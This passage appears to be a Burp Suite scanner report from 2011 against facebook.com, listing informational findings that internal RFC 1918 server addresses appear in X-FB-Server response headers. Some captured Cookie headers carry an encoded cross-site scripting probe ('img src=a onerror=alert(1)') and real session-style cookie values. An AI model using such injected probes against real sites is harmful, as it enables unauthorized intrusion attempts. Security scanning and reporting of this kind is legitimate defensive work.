Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.45
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0

20.247. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.169.25

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.169.25
X-Cnection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 0

20.248. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.104.59

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.59
X-Cnection: close
Date: Thu, 05 May 2011 11:39:24 GMT
Content-Length: 0

20.249. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.144.25

Request

GET /people/Bucky-Jordan/100000824820783 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.25
X-Cnection: close
Date: Thu, 05 May 2011 11:39:27 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.250. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.233.110

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.251. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.199.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=L4Nps; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.31
X-Cnection: close
Date: Thu, 05 May 2011 11:43:06 GMT
Content-Length: 14549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.252. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783/x22

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.155.61

Request

GET /people/Bucky-Jordan/100000824820783/x22 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.61
Connection: close
Date: Thu, 05 May 2011 11:43:06 GMT
Content-Length: 4

/x22

20.253. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.55.45

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.254. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.199.52

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.255. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.52

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.256. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.68.111

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.257. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.61

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.258. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.51.59

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.259. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.37.69

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.260. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.98.121

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.261. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.134.132

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.262. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.118.101

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.263. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.136.27

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.264. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.240.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.265. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.76.29

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.266. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.55.108

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.267. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.153.43

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.268. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.239.25

Request

